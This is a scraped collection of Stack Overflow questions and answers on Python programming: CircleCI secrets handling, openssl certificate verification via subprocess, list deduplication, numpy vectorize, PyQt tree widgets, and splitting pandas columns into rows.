<p>Another approach, depending on your specifics, might make use of the fact that the <code>type</code> type is immutable, and thus able to be used as a dictionary key.</p> <p>So you could do something like:</p> <pre><code>from collections import defaultdict list_of_things = [2, 3, "Some", "String"] obj_map = defaultdict(list) for obj in list_of_things: obj_map[type(obj)].append(obj) print(obj_map) </code></pre> <p>Output:</p> <pre><code>defaultdict(&lt;type 'list'&gt;, { &lt;type 'int'&gt;: [2, 3], &lt;type 'str'&gt;: ['Some', 'String'] }) </code></pre> <p>The idea here is that you don't need to write a whole bunch of <code>if isinstance</code> tests, you just "group by" each object's type.</p> <p>You can access values of the dictionary by using the class name as the key:</p> <pre><code>print(obj_map[int]) # [2, 3] </code></pre>
0
2016-08-01T23:01:28Z
[ "python", "serialization", "duck-typing" ]
use environment variables in CircleCI
38,709,099
<p>I'm trying to use CircleCI to run automated tests. I have a config.yml file tat contains secrets that I don't want to upload to my repo for obvius reasons. </p> <p>Thus I've created a set of env varialbes in the Project Settings section:</p> <pre><code>VR_API_KEY = some_value CLARIFAI_CLIENT_ID = some_value CLARIFAI_CLIENT_SECRET = some_value IMAGGA_API_KEY = some_value IMAGGA_API_SECRET = some_value </code></pre> <p>The config.yml, I've removed the actual values and looks like this</p> <pre><code>visual-recognition: api-key: ${VR_API_KEY} clarifai: client-id: ${CLARIFAI_CLIENT_ID} client-secret: ${CLARIFAI_CLIENT_SECRET} imagga: api-key: ${IMAGGA_API_KEY} api-secret: ${IMAGGA_API_SECRET} </code></pre> <p>I have a test that basically creates the API client instances and configures everything, this test fails because it looks like CircleCI is not correctly substituting the values...here is the output of some prints (this is just when the values are read from config.yml)</p> <pre><code>-------------------- &gt;&gt; begin captured stdout &lt;&lt; --------------------- Checking tagger queries clarifai API ${CLARIFAI_CLIENT_ID} ${CLARIFAI_CLIENT_SECRET} COULD NOT LOAD: 'UNAUTHORIZED' --------------------- &gt;&gt; end captured stdout &lt;&lt; ---------------------- </code></pre> <p>The COULD NOT LOAD: 'UNAUTHORIZED' is expected since unvalid credentials lead to Oauth dance failure</p> <p>Any clues? Thanks!</p> <p>Meaning there is no substitution and therefore all tests will fail....what I'm doing wrong here...by the way, I don't have a circle.yml file yet...do I need one?</p> <p>Thanks!</p> <p><strong>EDIT:</strong> If anyone runs into the same problem, solution was rather simple, I've simple ciphered the config.yml file as depicted here</p> <p><a href="https://github.com/circleci/encrypted-files" rel="nofollow">https://github.com/circleci/encrypted-files</a></p> <p>Then in circle.yml just add an instruction to decypher and name the output file config.yml...and that's it!</p> <pre><code>dependencies: pre: # update locally with: # openssl aes-256-cbc -e -in secret-env-plain -out secret-env-cipher -k $KEY - openssl aes-256-cbc -d -in config-cipher -k $KEY &gt;&gt; config.yml </code></pre>
0
2016-08-01T22:31:21Z
39,110,894
<p>CircleCI also supports putting in environment variables (<a href="https://circleci.com/docs/environment-variables/" rel="nofollow">CircleCI Environment Variables</a>). Instead of putting the value of the environment variable in the code, you go to project settings -> Environment Variables. Then just click add variable with name and value. You access the environment variable normally through the name.</p>
0
2016-08-23T21:22:46Z
[ "python", "circleci" ]
Running subprocesses command with two string inputs
38,709,118
<p>I'm trying to validate a certificate with a CA bundle file. The original Bash command takes two file arguments like this;</p> <pre><code>openssl verify -CAfile ca-ssl.ca cert-ssl.crt </code></pre> <p>I'm trying to figure out how to run the above command in python subprocess whilst having ca-ssl.ca and cert-ssl.crt as variable strings (as opposed to files). </p> <p>If I ran the command with variables (instead of files) in bash then this would work;</p> <pre><code>ca_value=$(&lt;ca-ssl.ca) cert_value=$(&lt;cert-ssl.crt) openssl verify -CAfile &lt;(echo "$ca_value") &lt;(echo "$cert_value") </code></pre> <p>However, I'm struggling to figure out how to do the above with Python, preferably without needing to use <code>shell=True</code>. I have tried the following but doesn't work and instead prints 'help' commands for openssl;</p> <pre><code>certificate = ''' cert string ''' ca_bundle = ''' ca bundle string ''' def ca_valid(cert, ca): ca_validation = subprocess.Popen(['openssl', 'verify', '-CAfile', ca, cert], stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=1) ca_validation_output = ca_validation.communicate()[0].strip() ca_validation.wait() ca_valid(certificate, ca_bundle) </code></pre> <p>Any guidance/clues on what I need to look further into would be appreciated. </p>
3
2016-08-01T22:33:53Z
38,709,397
<p>If you want to use process substitution, you will <em>have</em> to use <code>shell=True</code>. This is unavoidable. The <code>&lt;(...)</code> process substitution syntax is bash syntax; you simply must call bash into service to parse and execute such code.</p> <p>Additionally, you have to ensure that <code>bash</code> is invoked, as opposed to <code>sh</code>. On some systems <code>sh</code> may refer to an old Bourne shell (as opposed to the Bourne-again shell <code>bash</code>) in which case process substitution will definitely not work. On some systems <code>sh</code> will invoke <code>bash</code>, but process substitution will still not work, because when invoked under the name <code>sh</code> the <code>bash</code> shell enters something called POSIX mode. Here are some excerpts from the <code>bash</code> man page:</p> <blockquote> <p>...</p> <p>INVOCATION</p> <p>... When invoked as sh, bash enters posix mode after the startup files are read. ....</p> <p>...</p> <p>SEE ALSO</p> <p>...</p> <p><a href="http://tiswww.case.edu/~chet/bash/POSIX" rel="nofollow">http://tiswww.case.edu/~chet/bash/POSIX</a> -- a description of posix mode</p> <p>...</p> </blockquote> <p>From the above web link:</p> <blockquote> <ol start="28"> <li>Process substitution is not available.</li> </ol> </blockquote> <p><code>/bin/sh</code> seems to be the default shell in python, whether you're using <code>os.system()</code> or <code>subprocess.Popen()</code>. So you'll have to specify the argument <code>executable='bash'</code>, or <code>executable='/bin/bash'</code> if you want to specify the full path.</p> <p>This is working for me:</p> <pre><code>subprocess.Popen('printf \'argument: "%s"\\n\' verify -CAfile &lt;(echo ca_value) &lt;(echo cert_value);',executable='bash',shell=True).wait(); ## argument: "verify" ## argument: "-CAfile" ## argument: "/dev/fd/63" ## argument: "/dev/fd/62" ## 0 </code></pre> <hr> <p>Here's how you can actually embed the string values from variables:</p> <pre><code>bashEsc = lambda s: "'"+s.replace("'","'\\''")+"'"; ca_value = 'x'; cert_value = 'y'; cmd = 'printf \'argument: "%%s"\\n\' verify -CAfile &lt;(echo %s) &lt;(echo %s);'%(bashEsc(ca_value),bashEsc(cert_value)); subprocess.Popen(cmd,executable='bash',shell=True).wait(); ## argument: "verify" ## argument: "-CAfile" ## argument: "/dev/fd/63" ## argument: "/dev/fd/62" ## 0 </code></pre>
-2
2016-08-01T23:05:29Z
[ "python", "bash", "variables", "subprocess" ]
Running subprocesses command with two string inputs
38,709,118
<p>I'm trying to validate a certificate with a CA bundle file. The original Bash command takes two file arguments like this;</p> <pre><code>openssl verify -CAfile ca-ssl.ca cert-ssl.crt </code></pre> <p>I'm trying to figure out how to run the above command in python subprocess whilst having ca-ssl.ca and cert-ssl.crt as variable strings (as opposed to files). </p> <p>If I ran the command with variables (instead of files) in bash then this would work;</p> <pre><code>ca_value=$(&lt;ca-ssl.ca) cert_value=$(&lt;cert-ssl.crt) openssl verify -CAfile &lt;(echo "$ca_value") &lt;(echo "$cert_value") </code></pre> <p>However, I'm struggling to figure out how to do the above with Python, preferably without needing to use <code>shell=True</code>. I have tried the following but doesn't work and instead prints 'help' commands for openssl;</p> <pre><code>certificate = ''' cert string ''' ca_bundle = ''' ca bundle string ''' def ca_valid(cert, ca): ca_validation = subprocess.Popen(['openssl', 'verify', '-CAfile', ca, cert], stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=1) ca_validation_output = ca_validation.communicate()[0].strip() ca_validation.wait() ca_valid(certificate, ca_bundle) </code></pre> <p>Any guidance/clues on what I need to look further into would be appreciated. </p>
3
2016-08-01T22:33:53Z
38,861,639
<p>Bash process substitution <code>&lt;(...)</code> in the end is supplying a file path as an argument to <code>openssl</code>. </p> <p>You will need to make a helper function to create this functionality since Python doesn't have any operators that allow you to inline pipe data into a file and present its path:</p> <pre><code>import subprocess def validate_ca(cert, ca): with filearg(ca) as ca_path, filearg(cert) as cert_path: ca_validation = subprocess.Popen( ['openssl', 'verify', '-CAfile', ca_path, cert_path], stdout=subprocess.PIPE, ) return ca_validation.communicate()[0].strip() </code></pre> <p>Where <code>filearg</code> is a context manager which creates a named temporary file with your desired text, closes it, hands the path to you, and then removes it after the <code>with</code> scope ends.</p> <pre><code>import os import tempfile from contextlib import contextmanager @contextmanger def filearg(txt): with tempfile.NamedTemporaryFile('w', delete=False) as fh: fh.write(txt) try: yield fh.name finally: os.remove(fh.name) </code></pre> <p>Anything accessing this temporary file(like the subprocess) needs to work inside the context manager.</p> <p>By the way, the <code>Popen.wait(self)</code> is redundant since <code>Popen.communicate(self)</code> waits for termination.</p>
1
2016-08-09T22:49:00Z
[ "python", "bash", "variables", "subprocess" ]
How can I write a list without duplicate with only for, if and boolean
38,709,150
<p>My professor gave me an exercise where I write a function that returns a list without the duplicate to the old list. This is the code but I don't know how to write the method without using <code>.remove()</code>:</p> <pre><code>def distinct(lst): lstnew = [] c = range(len(lst)) for i in range(len(lst)): if i in range(len(lst)) != c: lstnew += [i] c += 1 return lstnew print distinct([1,3,1,2,6]) print distinct([['a','ab','a','ab']]) </code></pre> <p>I forgot to write an important thing, I must preserve order in the output list.</p> <p>[UPDATE] After I read the answer of Jai Srivastav I code this:</p> <pre><code>def distinct(lst): lstnew = [] for element in lst: if element not in lstnew: lstnew = lstnew + [element] return lstnew </code></pre> <p>And It works perfectly</p>
1
2016-08-01T22:37:14Z
38,709,214
<pre><code>def distinct(lst): dlst = [] for val in lst: if val not in dlst: dlst.append(val) return dlst </code></pre>
3
2016-08-01T22:44:46Z
[ "python", "python-2.7" ]
How can I write a list without duplicate with only for, if and boolean
38,709,150
<p>My professor gave me an exercise where I write a function that returns a list without the duplicate to the old list. This is the code but I don't know how to write the method without using <code>.remove()</code>:</p> <pre><code>def distinct(lst): lstnew = [] c = range(len(lst)) for i in range(len(lst)): if i in range(len(lst)) != c: lstnew += [i] c += 1 return lstnew print distinct([1,3,1,2,6]) print distinct([['a','ab','a','ab']]) </code></pre> <p>I forgot to write an important thing, I must preserve order in the output list.</p> <p>[UPDATE] After I read the answer of Jai Srivastav I code this:</p> <pre><code>def distinct(lst): lstnew = [] for element in lst: if element not in lstnew: lstnew = lstnew + [element] return lstnew </code></pre> <p>And It works perfectly</p>
1
2016-08-01T22:37:14Z
38,709,227
<p>Is this considered cheating?</p> <pre><code>&gt;&gt;&gt; distinct = lambda lst: list(set(lst)) &gt;&gt;&gt; distinct([1,3,1,2,6]) [1, 2, 3, 6] &gt;&gt;&gt; distinct(['a','ab','a','ab']) ['a', 'ab'] </code></pre>
2
2016-08-01T22:46:25Z
[ "python", "python-2.7" ]
How can I write a list without duplicate with only for, if and boolean
38,709,150
<p>My professor gave me an exercise where I write a function that returns a list without the duplicate to the old list. This is the code but I don't know how to write the method without using <code>.remove()</code>:</p> <pre><code>def distinct(lst): lstnew = [] c = range(len(lst)) for i in range(len(lst)): if i in range(len(lst)) != c: lstnew += [i] c += 1 return lstnew print distinct([1,3,1,2,6]) print distinct([['a','ab','a','ab']]) </code></pre> <p>I forgot to write an important thing, I must preserve order in the output list.</p> <p>[UPDATE] After I read the answer of Jai Srivastav I code this:</p> <pre><code>def distinct(lst): lstnew = [] for element in lst: if element not in lstnew: lstnew = lstnew + [element] return lstnew </code></pre> <p>And It works perfectly</p>
1
2016-08-01T22:37:14Z
38,709,233
<p>If order isn't important, you can cast it to a <code>set</code>, then back to a <code>list</code></p> <pre><code>def distinct(lst): return list(set(lst)) </code></pre>
1
2016-08-01T22:46:47Z
[ "python", "python-2.7" ]
How can I write a list without duplicate with only for, if and boolean
38,709,150
<p>My professor gave me an exercise where I write a function that returns a list without the duplicate to the old list. This is the code but I don't know how to write the method without using <code>.remove()</code>:</p> <pre><code>def distinct(lst): lstnew = [] c = range(len(lst)) for i in range(len(lst)): if i in range(len(lst)) != c: lstnew += [i] c += 1 return lstnew print distinct([1,3,1,2,6]) print distinct([['a','ab','a','ab']]) </code></pre> <p>I forgot to write an important thing, I must preserve order in the output list.</p> <p>[UPDATE] After I read the answer of Jai Srivastav I code this:</p> <pre><code>def distinct(lst): lstnew = [] for element in lst: if element not in lstnew: lstnew = lstnew + [element] return lstnew </code></pre> <p>And It works perfectly</p>
1
2016-08-01T22:37:14Z
38,709,889
<p>If you need to eliminate duplicates AND preserve order you can do this:</p> <pre><code>def distinct(lst): seen = set() for item in lst: if item not in seen: yield item seen.add(item) </code></pre> <hr> <pre><code>a = [1,3,1,2,6] print(list(distinct(a))) [1,3,2,6] </code></pre> <hr> <pre><code>b = ['a','ab','a','ab'] print(list(distinct(b))) ['a', 'ab'] </code></pre> <p>See a demo here: <a href="https://ideone.com/a2khCg" rel="nofollow">https://ideone.com/a2khCg</a></p>
0
2016-08-02T00:11:33Z
[ "python", "python-2.7" ]
How can I write a list without duplicate with only for, if and boolean
38,709,150
<p>My professor gave me an exercise where I write a function that returns a list without the duplicate to the old list. This is the code but I don't know how to write the method without using <code>.remove()</code>:</p> <pre><code>def distinct(lst): lstnew = [] c = range(len(lst)) for i in range(len(lst)): if i in range(len(lst)) != c: lstnew += [i] c += 1 return lstnew print distinct([1,3,1,2,6]) print distinct([['a','ab','a','ab']]) </code></pre> <p>I forgot to write an important thing, I must preserve order in the output list.</p> <p>[UPDATE] After I read the answer of Jai Srivastav I code this:</p> <pre><code>def distinct(lst): lstnew = [] for element in lst: if element not in lstnew: lstnew = lstnew + [element] return lstnew </code></pre> <p>And It works perfectly</p>
1
2016-08-01T22:37:14Z
38,714,922
<p>There are Excellent Solutions That I Already Applied. But my professor said us that we don't must use the methods of the list. Has anyone else got any more thoughts?</p>
0
2016-08-02T08:02:14Z
[ "python", "python-2.7" ]
Copy QTreeWidgetItem from QPushButton item widget
38,709,274
<p>I'd like to copy a QTreeWidgetItem, if a push-button is pushed within it.</p> <p>So far I've got:</p> <pre><code>def Copy(self): obj = self.sender() self.Tree = qt.QTreeWidget(self) self.Tree.setHeaderLabels(["Name"]) item = qt.QTreeWidgetItem("Name") self.Tree.addTopLevelItem(item) childItem = qt.QTreeWidgetItem("Name") #&lt;------- This I'd like to copy item.addChild(childItem) bttn = qt.QPushButton("Copy This Widget", self) bttn.clicked.connect(self.Copy) self.Tree.setItemWidget(childItem, 1, bttn) </code></pre> <p>I'd like to be able to copy <code>childItem</code>, so that I may place it in a QTreeWidget.</p>
0
2016-08-01T22:51:30Z
38,709,327
<p>There's no direct way to get the <code>QTreeWidgetItem</code> from its item-widget, so you will have to explicitly store the index somewhere so that it can be accessed later.</p> <p>One way to do this is to add the index to the item-widget as a property:</p> <pre><code>bttn = qt.QPushButton("Copy This Widget", self) index = QtCore.QPersistentModelIndex(self.Tree.indexFromItem(childItem)) bttn.setProperty('index', index) ... def Copy(self): index = self.sender().property('index') if index.isValid(): copyItem = qt.QTreeWidgetItem(self.Tree.itemFromIndex(index)) </code></pre>
1
2016-08-01T22:58:10Z
[ "python", "pyqt", "qtreewidgetitem" ]
Converting image file from attachment to Pdf file in python
38,709,298
<p>I am trying to convert images from the attachment of .msg file and save into PdF file. However i get the error when i tried to read the image file for converting into PdF file. Here is the part of my code </p> <pre><code>if count_attachments &gt; 0: for item in range(count_attachments): attached = msg.Attachments.Item(item + 1) extension = attached.filename.split(".")[-1] if extension == 'jpg' or extension == 'png': pp = PdfPages(newname) img_data = open(attached, 'rb').read() pp.savefig(img_data) pp.close() </code></pre> <p>Here is the error I got from the compiler</p> <pre><code>Traceback (most recent call last): File "email-reader1.py", line 52, in &lt;module&gt; img_data = open(attached, 'rb').read() TypeError: Can't convert 'CDispatch' object to str implicitly </code></pre>
0
2016-08-01T22:54:10Z
38,709,344
<p>Replace the line:<br> <code>img_data = open(attached, 'rb').read()</code> </p> <p>with:<br> <code>img_data = open(attached.filename, 'rb').read()</code></p>
0
2016-08-01T23:00:03Z
[ "python", "python-3.x", "pdf" ]
numpy vectorize multidimensional function
38,709,313
<p>I am having problems to vectorize a multidimensional function.<br> Consider the following example:</p> <pre><code>def _cost(u): return u[0] - u[1] cost = np.vectorize(_cost) &gt;&gt;&gt; x = np.random.normal(0, 1,(10, 2)) &gt;&gt;&gt; cost(x) Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2218, in __call__ return self._vectorize_call(func=func, args=vargs) File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2281, in _vectorize_call ufunc, otypes = self._get_ufunc_and_otypes(func=func, args=args) File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2243, in _get_ufunc_and_otypes outputs = func(*inputs) TypeError: _cost() missing 1 required positional argument: 'v' </code></pre> <p>Background information: I encountered the problem while trying to generalize the following code (Particle Swarm Optimization Algorithm) to multivariate data:</p> <pre><code>import numpy as np import matplotlib.pyplot as plt def pso(cost, sim, space_dimension, n_particles, left_lim, right_lim, f1=1, f2=1, verbose=False): best_scores = np.array([np.inf]*n_particles) best_positions = np.zeros(shape=(n_particles, space_dimension)) particles = np.random.uniform(left_lim, right_lim, (n_particles, space_dimension)) velocities = np.zeros(shape=(n_particles, space_dimension)) for i in range(sim): particles = particles + velocities print(particles) scores = cost(particles).ravel() better_positions = np.argwhere(scores &lt; best_scores).ravel() best_scores[better_positions] = scores[better_positions] best_positions[better_positions, :] = particles[better_positions, :] g = best_positions[np.argmin(best_scores), :] u1 = np.random.uniform(0, f1, (n_particles, 1)) u2 = np.random.uniform(0, f2, (n_particles, 1)) velocities = velocities + u1 * (best_positions - particles) + u2 * (g - particles) if verbose and i % 50 == 0: print('it=', i, ' score=', cost(g)) x = np.linspace(-5, 20, 1000) y = cost(x) plt.plot(x, y) plt.plot(particles, cost(particles), 'o') plt.vlines(g, y.min()-2, y.max()) plt.show() return g, cost(g) def test_pso_1_dim(): def _cost(x): if 0 &lt; x &lt; 15: return np.sin(x)*x else: return 15 + np.min([np.abs(x-0), np.abs(x-15)]) cost = np.vectorize(_cost) sim = 100 space_dimension = 1 n_particles = 5 left_lim, right_lim = 0, 15 f1, f2 = 1, 1 x, cost_x = pso(cost, sim, space_dimension, n_particles, left_lim, right_lim, f1, f2, verbose=False) x0 = 11.0841839 assert np.abs(x - x0) &lt; 0.01 return </code></pre> <p>Please advise me if vectorization is not a good idea in this case. </p>
0
2016-08-01T22:55:45Z
38,709,406
<p>As mentioned in the notes for <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.vectorize.html" rel="nofollow"><code>vectorize</code></a>: </p> <blockquote> <p>The vectorize function is provided primarily for convenience, not for performance. The implementation is essentially a for loop.</p> </blockquote> <p>So while vectorizing your code may be a good idea via <code>numpy</code> types and functions, you probably shouldn't do this using <code>numpy.vectorize</code>. </p> <p>For the example you gave, your <code>cost</code> might be simply and efficiently calculated as a function operating on a <code>numpy</code> array: </p> <pre><code>def cost(x): # Create the empty output output = np.empty(x.shape) # Select the first group using a boolean array group1 = (0 &lt; x) &amp; (x &lt; 15) output[group1] = np.sin(x[group1])*x[group1] # Select second group as inverse (logical not) of group1 output[~group1] = 15 + np.min( [np.abs(x[~group1]-0), np.abs(x[~group1]-15)], axis=0) return output </code></pre>
0
2016-08-01T23:07:14Z
[ "python", "arrays", "numpy", "multidimensional-array", "vectorization" ]
numpy vectorize multidimensional function
38,709,313
<p>I am having problems to vectorize a multidimensional function.<br> Consider the following example:</p> <pre><code>def _cost(u): return u[0] - u[1] cost = np.vectorize(_cost) &gt;&gt;&gt; x = np.random.normal(0, 1,(10, 2)) &gt;&gt;&gt; cost(x) Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2218, in __call__ return self._vectorize_call(func=func, args=vargs) File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2281, in _vectorize_call ufunc, otypes = self._get_ufunc_and_otypes(func=func, args=args) File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2243, in _get_ufunc_and_otypes outputs = func(*inputs) TypeError: _cost() missing 1 required positional argument: 'v' </code></pre> <p>Background information: I encountered the problem while trying to generalize the following code (Particle Swarm Optimization Algorithm) to multivariate data:</p> <pre><code>import numpy as np import matplotlib.pyplot as plt def pso(cost, sim, space_dimension, n_particles, left_lim, right_lim, f1=1, f2=1, verbose=False): best_scores = np.array([np.inf]*n_particles) best_positions = np.zeros(shape=(n_particles, space_dimension)) particles = np.random.uniform(left_lim, right_lim, (n_particles, space_dimension)) velocities = np.zeros(shape=(n_particles, space_dimension)) for i in range(sim): particles = particles + velocities print(particles) scores = cost(particles).ravel() better_positions = np.argwhere(scores &lt; best_scores).ravel() best_scores[better_positions] = scores[better_positions] best_positions[better_positions, :] = particles[better_positions, :] g = best_positions[np.argmin(best_scores), :] u1 = np.random.uniform(0, f1, (n_particles, 1)) u2 = np.random.uniform(0, f2, (n_particles, 1)) velocities = velocities + u1 * (best_positions - particles) + u2 * (g - particles) if verbose and i % 50 == 0: print('it=', i, ' score=', cost(g)) x = np.linspace(-5, 20, 1000) y = cost(x) plt.plot(x, y) plt.plot(particles, cost(particles), 'o') plt.vlines(g, y.min()-2, y.max()) plt.show() return g, cost(g) def test_pso_1_dim(): def _cost(x): if 0 &lt; x &lt; 15: return np.sin(x)*x else: return 15 + np.min([np.abs(x-0), np.abs(x-15)]) cost = np.vectorize(_cost) sim = 100 space_dimension = 1 n_particles = 5 left_lim, right_lim = 0, 15 f1, f2 = 1, 1 x, cost_x = pso(cost, sim, space_dimension, n_particles, left_lim, right_lim, f1, f2, verbose=False) x0 = 11.0841839 assert np.abs(x - x0) &lt; 0.01 return </code></pre> <p>Please advise me if vectorization is not a good idea in this case. </p>
0
2016-08-01T22:55:45Z
38,709,980
<p><code>np.vectorize</code> feeds scalars to your function. For example:</p> <pre><code>In [1090]: def _cost(u): ...: return u*2 In [1092]: cost=np.vectorize(_cost) In [1093]: cost(np.arange(10) ...: ) Out[1093]: array([ 0, 2, 4, 6, 8, 10, 12, 14, 16, 18]) In [1094]: cost(np.ones((3,4))) Out[1094]: array([[ 2., 2., 2., 2.], [ 2., 2., 2., 2.], [ 2., 2., 2., 2.]]) </code></pre> <p>But your function acts as though it is getting a list or array with 2 values. What were you intending?</p> <p>A function with 2 scalars:</p> <pre><code>In [1095]: def _cost(u,v): ...: return u+v ...: ...: In [1096]: cost=np.vectorize(_cost) In [1098]: cost(np.arange(3),np.arange(3,6)) Out[1098]: array([3, 5, 7]) In [1099]: cost([[1],[2]],np.arange(3,6)) Out[1099]: array([[4, 5, 6], [5, 6, 7]]) </code></pre> <p>Or with your 2 column <code>x</code>:</p> <pre><code>In [1103]: cost(x[:,0],x[:,1]) Out[1103]: array([-1.7291913 , -0.46343403, 0.61574928, 0.9864683 , -1.22373097, 1.01970917, 0.22862683, -0.11653917, -1.18319723, -3.39580376]) </code></pre> <p>which is the same as doing an array sum on axis 1</p> <pre><code>In [1104]: x.sum(axis=1) Out[1104]: array([-1.7291913 , -0.46343403, 0.61574928, 0.9864683 , -1.22373097, 1.01970917, 0.22862683, -0.11653917, -1.18319723, -3.39580376]) </code></pre>
0
2016-08-02T00:22:28Z
[ "python", "arrays", "numpy", "multidimensional-array", "vectorization" ]
Appending Multiple Text Files using Dictionaries Python
38,709,322
<p>I am currently working on some Data Analytics work and I'm having a bit of trouble with the Data Preprocessing.</p> <p>I have compiled a folder of text files, with the name of the text file being the date that the text file corresponds to. I was originally able to append all of the text files to one document, but I wanted to use a dictionary in order to have 2 attributes, the filename (also the date) and the content in the text file.</p> <p>This is the code:</p> <pre><code>import json import os import math # Define output filename OutputFilename = 'finalv2.txt' # Define path to input and output files InputPath = 'C:/Users/Mike/Desktop/MonthlyOil/TextFiles' OutputPath = 'C:/Users/Mike/Desktop/MonthlyOil/' # Convert forward/backward slashes InputPath = os.path.normpath(InputPath) OutputPath = os.path.normpath(OutputPath) # Define output file and open for writing filename = os.path.join(OutputPath,OutputFilename) file_out = open(filename, 'w') print ("Output file opened") size = math.inf def append_record(record): with open('finalv2.txt', 'a') as f: json.dump(record, f) f.write(json.dumps(record)) # Loop through each file in input directory for file in os.listdir(InputPath): # Define full filename filename = os.path.join(InputPath,file) if os.path.isfile(filename): print (" Adding :" + file) file_in = open(filename, 'r') content = file_in.read() dict = {'filename':filename,'content':content} print ("dict['filename']: ", dict['filename'] ) append_record(dict) file_in.close() # Close output file file_out.close() print ("Output file closed") </code></pre> <p>The problem I am experiencing is that it won't append my file, I havea line in there which tests whether or not the dict contains anything and it does, I have tested both content and filename.</p> <p>Any ideas what I'm missing to get the dict appended to the file?</p>
0
2016-08-01T22:57:09Z
38,709,528
<p>There are many issues, but the one that is causing the trouble here is that you're opening <code>finalv2.txt</code> twice. Once with mode <code>w</code> (and doing nothing with it), and again inside <code>append_record()</code>, this time with mode <code>a</code>.</p> <p>Consider the following:</p> <pre><code>import json import os import math # Define output filename OutputFilename = 'finalv2.txt' # Define path to input and output files InputPath = 'C:/Users/Mike/Desktop/MonthlyOil/TextFiles' OutputPath = 'C:/Users/Mike/Desktop/MonthlyOil/' # Convert forward/backward slashes InputPath = os.path.normpath(InputPath) OutputPath = os.path.normpath(OutputPath) # Define output file out_file = os.path.join(OutputPath,OutputFilename) size = None def append_record(fn, record): with open(fn, 'a') as f: json.dump(record, f) #f.write(json.dumps(record)) # Loop through each file in input directory for fn in os.listdir(InputPath): # Define full filename in_file = os.path.join(InputPath,fn) if os.path.isfile(in_file): print(" Adding: " + fn) with open(in_file, 'r') as file_in: content = file_in.read() d = {'filename':in_file, 'content':content} print("d['filename']: ", d['filename'] ) append_record(out_file, d) </code></pre> <p>Which works as you expected.</p> <p>Here:</p> <ul> <li>Files aren't explicitly opened and closed, they're managed by context managers (<code>with</code>)</li> <li>There are no longer variables named <code>dict</code> and <code>file</code></li> <li>You define <code>finalv2.txt</code> in one place, and one place only</li> <li><code>filename</code> is not defined twice, once as the output file and then again as the input file. Instead there are <code>out_file</code> and <code>in_file</code></li> <li>You pass the output filename to your <code>append_record</code> function</li> <li>You don't (attempt to) append the json twice -- only once (you can pick which method you prefer, they both work)</li> </ul>
3
2016-08-01T23:21:52Z
[ "python", "dictionary" ]
Python Pandas: Split slash separated strings in two or more columns into multiple rows
38,709,423
<p>I have a pandas dataframe that looks like this:</p> <pre><code>SUBJECT STUDENT CITY STATE Math/Chemistry/Biology Sam/Peter/Mary Los Angeles CA Geology/Physics John Boston MA </code></pre> <p>This is how it should look like:</p> <pre><code>SUBJECT STUDENT CITY STATE Math Sam Los Angeles CA Chemistry Peter Los Angeles CA Biology Mary Los Angeles CA Geology John Boston MA Physics John Boston MA </code></pre> <p>Before asking this question, I referred to the solutions mentioned in this page: <a href="http://stackoverflow.com/questions/17116814/pandas-how-do-i-split-text-in-a-column-into-multiple-rows">pandas: How do I split text in a column into multiple rows?</a></p> <p>Since there are slash separated strings in two columns, I am not able to use the solutions in the above link.</p>
2
2016-08-01T23:09:12Z
38,709,640
<p>First thing, split fields by <code>'/'</code></p> <pre><code>df.SUBJECT = df.SUBJECT.str.split('/') df.STUDENT = df.STUDENT.str.split('/') </code></pre> <p>Then I use a function to explode rows. However, I had to segregate those rows that only had one student or subject.</p> <pre><code>def explode(df, columns): idx = np.repeat(df.index, df[columns[0]].str.len()) a = df.T.reindex_axis(columns).values concat = np.concatenate([np.concatenate(a[i]) for i in range(a.shape[0])]) p = pd.DataFrame(concat.reshape(a.shape[0], -1).T, idx, columns) return pd.concat([df.drop(columns, axis=1), p], axis=1).reset_index(drop=True) cond = df.STUDENT.str.len() == df.SUBJECT.str.len() df_paired = df[cond] df_unpard = df[~cond] if not df_paired.empty: df_paired = explode(df_paired, ['STUDENT','SUBJECT']) if not df_unpard.empty: df_unpard = explode(explode(df_unpard, ['STUDENT']), ['SUBJECT']) </code></pre> <p>Finally</p> <pre><code>pd.concat([df_paired, df_unpard], ignore_index=True)[df.columns] </code></pre> <p><a href="http://i.stack.imgur.com/topQc.png" rel="nofollow"><img src="http://i.stack.imgur.com/topQc.png" alt="enter image description here"></a></p> <hr> <h3>Timing</h3> <p><strong><em>piRSquared</em></strong></p> <pre><code>%%timeit df = df_.copy() df.SUBJECT = df.SUBJECT.str.split('/') df.STUDENT = df.STUDENT.str.split('/') def explode(df, columns): idx = np.repeat(df.index, df[columns[0]].str.len()) a = df.T.reindex_axis(columns).values concat = np.concatenate([np.concatenate(a[i]) for i in range(a.shape[0])]) p = pd.DataFrame(concat.reshape(a.shape[0], -1).T, idx, columns) return pd.concat([df.drop(columns, axis=1), p], axis=1).reset_index(drop=True) cond = df.STUDENT.str.len() == df.SUBJECT.str.len() df_paired = df[cond] df_unpard = df[~cond] if not df_paired.empty: df_paired = explode(df_paired, ['STUDENT','SUBJECT']) if not df_unpard.empty: df_unpard = explode(explode(df_unpard, ['STUDENT']), ['SUBJECT']) pd.concat([df_paired, df_unpard], ignore_index=True)[df.columns] 100 loops, best of 3: 7.76 ms per loop </code></pre> <hr> <p><strong><em>jezrael</em></strong></p> <pre><code>%%timeit df = df_.copy() s1 = df.SUBJECT.str.split('/', expand=True).stack() s2 = df.STUDENT.str.split('/', expand=True).stack() df1 = pd.concat([s1,s2], axis=1, keys=('SUBJECT','STUDENT')) \ .ffill() \ .reset_index(level=1, drop=True) df.drop(['SUBJECT','STUDENT'], axis=1) \ .join(df1) \ .reset_index(drop=True)[['SUBJECT', 'STUDENT', 'CITY','STATE']] 100 loops, best of 3: 5.13 ms per loop </code></pre>
3
2016-08-01T23:35:59Z
